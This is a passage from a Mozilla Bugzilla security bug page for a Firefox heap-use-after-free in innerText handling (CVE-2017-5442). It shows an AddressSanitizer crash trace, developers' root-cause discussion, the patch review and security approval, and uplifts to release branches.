    #36 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #37 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #38 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #39 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #40 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #41 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #42 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #43 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #44 0x7f3178d7340b in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12081:3

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsIFrame.h:676:43 in GetContent
Shadow bytes around the buggy address:
  0x0c4a80071680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a800716d0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7691==ABORTING
Group: core-security → dom-core-security
Keywords: csectype-uaf, sec-high
Matt, I wonder if this might be related to bug 1302071? Wild guess.
Flags: needinfo?(matt.woodrow)
status-firefox52: --- → ?
status-firefox53: --- → ?
status-firefox54: --- → ?
I don't think bug 1302071 is related, this looks like a classic layout crash.

It looks like nsRange::GetInnerTextNoFlush is calling ElementIsVisible, which results in a style flush and the entire PresShell being destroyed (destructor called when we exit nsComputedDOMStyle::GetStyleContextForElement and drop the nsCOMPtr ref).

We then attempt to continue using 'f', which was allocated within the PresShell's arena, and we crash.

What's not clear to me is why the style flush actually does anything, since the caller (nsGenericHTMLElement::GetInnerText) should have flushed Layout, which includes style.

Maybe the ruby causes problems?

Any ideas Mats?
Component: DOM → Layout
Flags: needinfo?(matt.woodrow) → needinfo?(mats)
(Assignee)

Comment 3

2 years ago
Created attachment 8848269 [details]
stack for SetNeedStyleFlush

Right, it seems rather bad for a method with "NoFlush" in its name to call functions that may lead to a flush...  I don't think FlushPendingNotifications
gives any guarantees that flushing again is a NOP.

The call chain here is:
nsRange::GetInnerTextNoFlush
  ElementIsVisible
    nsComputedDOMStyle::GetStyleContextForElement
      presShell->FlushPendingNotifications(FlushType::Style)

I'm attaching the stack that requested the style flush.
Flags: needinfo?(mats)
(Assignee)

Comment 4

2 years ago
Created attachment 8848275 [details] [diff] [review]
fix
Assignee: nobody → mats
Attachment #8848275 - Flags: review?(bugs)
Flags: sec-bounty?
(Assignee)

Comment 5

2 years ago
FTR, it looks like Boris added the SetNeedStyleFlush() call in
PresShell::ResizeReflowIgnoreOverride in bug 709256 part 3:
http://searchfox.org/mozilla-central/diff/ea35d340a7db4331568e09d2cb46555fceb162ef/layout/base/nsPresShell.cpp#2186
Severity: normal → critical
Flags: in-testsuite?
Keywords: crash, testcase
OS: Unspecified → All
Hardware: Unspecified → All
Attachment #8848275 - Flags: review?(bugs) → review+
(Assignee)

Comment 6

2 years ago
Comment on attachment 8848275 [details] [diff] [review]
fix

[Security approval request comment]
How easily could an exploit be constructed based on the patch?  

Probably not that hard to exploit once you find a testcase that crashes.
There's a virtual GetRenderedText() call just below the UAF crash in
comment 0:
3588            result.AddRequiredLineBreakCount(GetRequiredInnerTextLineBreakCount(f));
3589            if (isText) {
3590              nsIFrame::RenderedText text = f->GetRenderedText();


Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

The name of the changed method reveals that a DOM innerText function
is involved somehow.  It's probably not that hard to see that there
is some style change involved also.

Which older supported branches are affected by this flaw?

We added support for innerText in bug 264412, so probably all versions
since then, i.e. v45 or newer.

If not all supported branches, which bug introduced the flaw?

bug 264412, I suspect

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

Should be trivial to backport to all branches

How likely is this patch to cause regressions; how much testing does it need?

Very unlikely.  None.
Attachment #8848275 - Flags: sec-approval?
(Assignee)

Updated

2 years ago
Component: Layout → DOM: Core & HTML
status-firefox52: ? → affected
status-firefox53: ? → affected
status-firefox54: ? → affected
status-firefox-esr45: --- → affected
status-firefox-esr52: --- → affected
tracking-firefox52: --- → ?
tracking-firefox53: --- → ?
tracking-firefox54: --- → ?
tracking-firefox55: --- → ?
tracking-firefox-esr45: --- → ?
tracking-firefox-esr52: --- → ?
> FTR, it looks like Boris added the SetNeedStyleFlush() call in
> PresShell::ResizeReflowIgnoreOverride in bug 709256 part 3:

Just to be clear, before that our behavior was to always flush if someone asked for a flush (as in, as if SetNeedsStyleFlush() had been called at all times)....

That said, that stack looks moderately fishy to me, in the sense that we're in the middle of a flush and shouldn't really need to SetNeedStyleFlush() there.  I'm not sure what a clean way to avoid it is, though, and a stray SetNeedStyleFlush is really mostly a performance problem.
sec-approval+ for trunk.
We'll want patches made and nominated for all affected branches including both ESR branches.
status-firefox52: affected → wontfix
tracking-firefox52: ? → ---
tracking-firefox53: ? → +
tracking-firefox54: ? → +
tracking-firefox55: ? → +
tracking-firefox-esr45: ? → 53+
tracking-firefox-esr52: ? → 53+
Attachment #8848275 - Flags: sec-approval? → sec-approval+
https://hg.mozilla.org/mozilla-central/rev/145f874ee97afa9d1ee5ed1a47accda22adc5707
Status: NEW → RESOLVED
Last Resolved: 2 years ago
status-firefox55: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla55
(Assignee)

Comment 11

2 years ago
Comment on attachment 8848275 [details] [diff] [review]
fix

Approval Request Comment
[Feature/Bug causing the regression]:bug 264412, I suspect
[User impact if declined]:UAF crash
[Is this code covered by automated tests?]:yes
[Has the fix been verified in Nightly?]:no
[Needs manual test from QE? If yes, steps to reproduce]: no
[List of other uplifts needed for the feature/fix]:
[Is the change risky?]:no
[Why is the change risky/not risky?]:trivial fix
[String changes made/needed]: none
Attachment #8848275 - Flags: approval-mozilla-esr52?
Attachment #8848275 - Flags: approval-mozilla-esr45?
Attachment #8848275 - Flags: approval-mozilla-beta?
Attachment #8848275 - Flags: approval-mozilla-aurora?
Flags: sec-bounty? → sec-bounty+
Comment on attachment 8848275 [details] [diff] [review]
fix

Fix a sec-high. Aurora54+ & Beta53+.
Attachment #8848275 - Flags: approval-mozilla-beta?
Attachment #8848275 - Flags: approval-mozilla-beta+
Attachment #8848275 - Flags: approval-mozilla-aurora?
Attachment #8848275 - Flags: approval-mozilla-aurora+

Comment 14

2 years ago
uplift
https://hg.mozilla.org/releases/mozilla-beta/rev/b2be2b8f74bb
status-firefox53: affected → fixed
Comment on attachment 8848275 [details] [diff] [review]
fix

sec-high uaf fix for esr45.9 and esr52.1
Attachment #8848275 - Flags: approval-mozilla-esr52?
Attachment #8848275 - Flags: approval-mozilla-esr52+
Attachment #8848275 - Flags: approval-mozilla-esr45?
Attachment #8848275 - Flags: approval-mozilla-esr45+

Comment 16

2 years ago
uplift
https://hg.mozilla.org/releases/mozilla-esr52/rev/5f1aa2336998
https://hg.mozilla.org/releases/mozilla-esr45/rev/4ae2261bfab0
status-firefox-esr45: affected → fixed
status-firefox-esr52: affected → fixed
Group: dom-core-security → core-security-release
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+]
Alias: CVE-2017-5442
Setting qe-verify- based on Mats' assessment on manual testing needs and the fact that this fix has automated coverage (see Comment 11).
Flags: qe-verify-
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.